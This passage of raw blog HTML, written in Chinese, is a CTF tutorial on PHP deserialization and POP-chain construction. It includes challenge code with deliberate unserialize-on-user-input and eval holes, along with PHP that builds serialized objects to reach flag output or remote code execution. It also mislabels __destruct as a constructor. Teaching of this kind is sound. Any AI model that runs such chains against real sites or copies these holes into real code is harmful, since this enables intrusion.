data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-300x220.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-1024x751.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-43-1024x751.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-73\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uafdea8bc\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"547\" data-attachment-id=\"74\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=74\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png\" data-orig-size=\"901,547\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44-300x182.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-44.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-74\"  sizes=\"auto, (max-width: 901px) 100vw, 901px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u014a21eb\">\u6210\u529f\u89e6\u53d1\u4e86\u5176\u4e2d\u7684__destruct<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BzoFO\">\u4f8b\u98982<\/h4>\n\n\n\n<p id=\"ua29ee5fa\">\u6211\u4eec\u518d\u6765\u770b\u4e00\u9053\u7b80\u5355\u7684\u4f8b\u9898\uff0c\u8fd9\u9898\u76f8\u5bf9\u800c\u8a00\u96be\u5ea6\u66f4\u4f4e\uff0c\u56e0\u4e3a\u4e0d\u6d89\u53ca\u9b54\u672f\u65b9\u6cd5<\/p>\n\n\n\n<pre id=\"o2OIW\" class=\"wp-block-code\"><code>&lt;?php\nclass test{\n    public $a = 'echo \"this is test!!\";';\n    public function displayVar() {\n        eval($this-&gt;a);\n    }\n}\n\n$get = $_GET&#91;\"benben\"];\n$b = unserialize($get);\n$b-&gt;displayVar() ;\n\n?&gt;<\/code><\/pre>\n\n\n\n<p id=\"u1477d864\">\u4e0d\u9700\u8981\u7136\u540e\u7684\u6761\u4ef6\uff0c\u4ed6\u4f1a\u6267\u884c$a\u4e2d\u7684\u4ee3\u7801\uff0c\u90a3\u4e48\u53ea\u9700\u8981\u4fee\u6539$a \u7136\u540e\u5c06test\u8fd9\u4e2a\u7c7b\u8fdb\u884c\u5e8f\u5217\u5316\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"726\" height=\"614\" data-attachment-id=\"75\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=75\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png\" data-orig-size=\"726,614\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45-300x254.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-75\"  sizes=\"auto, (max-width: 726px) 100vw, 726px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u00f9c583\">\u672c\u5730\u6d4b\u8bd5\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-1024x731.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"731\" data-attachment-id=\"76\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=76\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46.png\" data-orig-size=\"1478,1055\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-300x214.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-1024x731.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-46-1024x731.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-76\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u20e35d75\">\u53ef\u4ee5\u76f4\u63a5rce<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"j8YnK\">pop\u94fe\u6784\u9020<\/h3>\n\n\n\n<p id=\"u5d14c4aa\">pop\u94fe\u662f\u901a\u8fc7\u89e6\u53d1\u9b54\u672f\u65b9\u6cd5\uff0c\u7136\u540e\u89e6\u53d1\u5176\u4ed6\u89e6\u53d1\u9b54\u672f\u65b9\u6cd5\uff0c\u7136\u540e\u4e00\u76f4\u5f80\u4e0b\u89e6\u53d1\uff0c\u76f4\u5230\u8fbe\u5230\u6700\u7ec8\u76ee\u7684\u83b7\u53d6flag<\/p>\n\n\n\n<p id=\"uabb3ba3c\">\u4e00\u822c\u7684CTF\u9898\u76ee\u4e2d\uff0c\u5927\u591a\u60c5\u51b5\u662f3-9\u4e2a\u7c7b\uff0c\u4e0d\u4f1a\u5199\u7279\u522b\u7279\u522b\u591a\uff0c\u6709\u4e9b\u65f6\u5019\u4e5f\u4f1a\u6709\u8ff7\u60d1\u4f60\u7684\u7c7b\uff0c\u8ba9\u4f60\u8d70\u4e0d\u901a\u94fe\u5b50<\/p>\n\n\n\n<p id=\"uf9ffd0a8\">\uff0c\u4e00\u822c\u62ff\u5230php\u53cd\u5e8f\u5217\u5316\u9898\u76ee\u7684\u65f6\u5019\uff0c\u9996\u5148\u9700\u8981\u627e\u94fe\u5c3e\uff0c\u4e5f\u5c31\u662f\u6700\u5173\u952e\u7684\u4e00\u4e2a\u7528\u4e8e\u83b7\u53d6flag\u7684\u7c7b\uff0c\u53ef\u80fd\u662frce\uff0c\u53ef\u80fd\u662fecho flag<\/p>\n\n\n\n<p id=\"ue22e79a3\">\u63a5\u4e0b\u6765\u7531\u6d45\u5165\u6df1\u6162\u6162\u5e26\u5927\u5bb6\u5206\u6790<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"Q9Hsv\">\u4f8b\u98981<\/h4>\n\n\n\n<pre id=\"xy0cU\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\n\nclass NSS1 {\n    var $name;\n\n    function __destruct() {\n        echo $this-&gt;name;\n    }\n}\n\nclass NSS2 {\n    var $name;\n\n    function __toString()\n    {\n        echo getenv('FLAG');\n    }\n}\n\nunserialize($_GET&#91;'n']);<\/code><\/pre>\n\n\n\n<p id=\"ucd9343d5\">\u975e\u5e38\u7b80\u77ed\u7684\u94fe\u5b50\uff0c\u5927\u5bb6\u53ef\u4ee5\u56de\u987e\u4e00\u4e0b__destruct\u548c__toString\u7684\u89e6\u53d1\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"ua79c0070\">__destruct\u662f\u6784\u9020\u51fd\u6570\uff0c\u5728\u5b9e\u4f8b\u5316\u4e00\u4e2a\u5bf9\u8c61\u7684\u65f6\u5019\uff0c\u9996\u5148\u4f1a\u53bb\u81ea\u52a8\u6267\u884c\u7684\u4e00\u4e2a\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"uba98726a\">\u4e5f\u5c31\u662f\u5728new\u4e00\u4e2a\u7c7b\u7684\u65f6\u5019\u89e6\u53d1 __toString\u7684\u89e6\u53d1\u6761\u4ef6\u662fecho\u628a\u5bf9\u8c61\u5f53\u6210\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u56c7dd2b\">pop\u94fe\u4e5f\u5c31\u5f88\u6e05\u6670\u4e86<\/p>\n\n\n\n<pre id=\"BX7Mh\" class=\"wp-block-code\"><code>NSS1::__destruct-&gt;NSS2::__toString:echo getenv('FLAG');<\/code><\/pre>\n\n\n\n<p id=\"u87a44414\">\u9996\u5148new\u5b9e\u4f8b\u5316\u4e00\u4e2a\u7c7b<\/p>\n\n\n\n<pre id=\"UJTeX\" class=\"wp-block-code\"><code>$nss = new NSS1();<\/code><\/pre>\n\n\n\n<p id=\"ucdd1828a\">\u8fd9\u6837\u5c31\u53ef\u4ee5\u89e6\u53d1__destruct<\/p>\n\n\n\n<p id=\"u6082644f\">\u63a5\u4e0b\u6765\u628anss1\u4e2decho\u7684name\u6307\u5b9a\u4e3anss2\u5bf9\u8c61<\/p>\n\n\n\n<pre id=\"Wn8aB\" class=\"wp-block-code\"><code>$nss-&gt;name = new NSS2();<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"77\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=77\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-47-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-77\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u12ff401a\">\u6211\u6709\u4e00\u4e0b\u4e60\u60ef\uff0c\u5c31\u662f\u5728\u6bcf\u4e2a\u9b54\u672f\u65b9\u6cd5\u540e\u9762\u52a0\u4e00\u4e2aecho \u201c\u89e6\u53d1\u4e86xxx\u9b54\u672f\u65b9\u6cd5\u201d\uff0c\u8fd9\u6837\u53ef\u4ee5\u770b\u5230\u81ea\u5df1\u7684\u94fe\u5b50\u662f\u5426\u8d70\u901a\u4e86\u4ee5\u53ca\u5224\u65ad\u94fe\u5b50\u65ad\u5728\u4e86\u54ea\u91cc<\/p>\n\n\n\n<p id=\"u54a0317c\">pop\u94fe<\/p>\n\n\n\n<pre id=\"x74ft\" class=\"wp-block-code\"><code>&lt;?php\n\nclass NSS1 {\n    var $name;\n\n    function __destruct() {\n        echo \"__destruct\u89e6\u53d1\".PHP_EOL;\n        echo $this-&gt;name;\n    }\n}\n\nclass NSS2 {\n    var $name;\n\n    function __toString()\n    {\n        echo getenv('FLAG');\n        echo \"ToString\u89e6\u53d1\".PHP_EOL;\n    }\n}\n\n\/\/ unserialize($_GET&#91;'n']);\n$nss = new NSS1();\n$nss-&gt;name = new NSS2();\necho serialize($nss ) .PHP_EOL;\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"78\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=78\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-48-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-78\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc6844e0d\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-1024x466.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"466\" data-attachment-id=\"79\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=79\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49.png\" data-orig-size=\"1919,874\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-300x137.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-1024x466.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-49-1024x466.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-79\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"HJt6S\">\u4f8b\u98983<\/h4>\n\n\n\n<pre id=\"omYNQ\" class=\"wp-block-code\"><code>&lt;?php\nhighlight_file(__FILE__);\n\nclass NSS1 {\n    var $name;\n\n    function __destruct() {\n        echo $this-&gt;name;\n    }\n}\n\nclass NSS2 {\n    var $name;\n\n    function __toString()\n    {\n        echo $this-&gt;name-&gt;test;\n    }\n}\n\nclass NSS3 {\n    var $name;\n    var $res;\n\n    function __get($name){\n        $this-&gt;name-&gt;getflag();\n    }\n\n    function __call($name, $arguments){\n        if ($this-&gt;res === 'nssctf') {\n            echo getenv('FLAG');\n        }\n    }\n}\nunserialize($_GET&#91;'n']);<\/code><\/pre>\n\n\n\n<p id=\"ub4e94a08\">\u7c7b\u53d8\u6210\u4e863\u4e2a\uff0c\u9996\u5148\u5224\u65ad\u94fe\u5c3e\uff0c\u7136\u540e\u6839\u636e\u94fe\u5c3e\u7684\u9b54\u672f\u65b9\u6cd5\u6162\u6162\u53cd\u63a8\uff0c\u94fe\u5c3e\u4e00\u770b\u5c31\u662f\u5728NSS3\u7684__call<\/p>\n\n\n\n<p id=\"u27fd2988\">\u56de\u5fc6\u4e00\u4e0b__call\u8981\u600e\u4e48\u89e6\u53d1<\/p>\n\n\n\n<p id=\"ubd3c7850\">\u8c03\u7528\u7684\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u7684\u540d\u79f0\u548c\u53c2\u6570\u7684\u65f6\u5019\u4f1a\u89e6\u53d1__call<\/p>\n\n\n\n<p id=\"u099998d2\">\u53d1\u73b0\u4ed6\u7684__get\u65b9\u6cd5\u89e6\u53d1\u7684getflag()\u6839\u672c\u5c31\u4e0d\u5b58\u5728\uff0c__call\u7684\u89e6\u53d1\u6761\u4ef6\u5c31\u662f\u8c03\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5<\/p>\n\n\n\n<p id=\"u36e7812d\">\u4efb\u4f55\u53d1\u73b0NSS2\u6709\u4e00\u4e2a__toString \u4ed6\u6267\u884c\u7684\u4ee3\u7801\u662f$this-&gt;name-&gt;test;<\/p>\n\n\n\n<p id=\"u79049d33\">\u8fd9\u4e2aname\u662f\u53ef\u4ee5\u63a7\u5236\u7684\uff0c\u53ea\u8981\u8ba9\u4ed6\u8c03\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u6210\u5458\u5c5e\u6027\u5c31\u53ef\u4ee5\u89e6\u53d1__get\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\u5c31\u662f\u901a\u8fc7NSS1\u7684__destruct\u6765echo\u89e6\u53d1__toString\u4e86\uff0c\u6211\u4eec\u53ef\u4ee5\u5c06name\u6307\u5411nss3 \u8fd9\u6837\u5c31\u53ef\u4ee5\u8bbf\u95eeNSS3\u8fd9\u4e2a\u7c7b\u5e76\u4e14\u89e6\u53d1__get<\/p>\n\n\n\n<p id=\"u7acfbde6\">\u5f53\u89e6\u53d1__get\u65f6$this-&gt;name-&gt;getflag();\u81ea\u52a8\u89e6\u53d1__call<\/p>\n\n\n\n<p id=\"u2dfdb2b5\">\u8fdb\u5165__call\u4ee5\u540e<\/p>\n\n\n\n<pre id=\"pCHPI\" class=\"wp-block-code\"><code>($this-&gt;res === 'nssctf')<\/code><\/pre>\n\n\n\n<p id=\"uf3a37038\">\u5c06NSS3\u7684name\u6307\u5411nssctf\u5373\u53ef\u89e6\u53d1\u63a5\u4e0b\u6765\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"80\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=80\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-50-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-80\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u20759204\">\u8fdc\u7a0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"81\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=81\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51.png\" data-orig-size=\"1919,1079\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-300x169.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-1024x576.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-51-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-81\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" 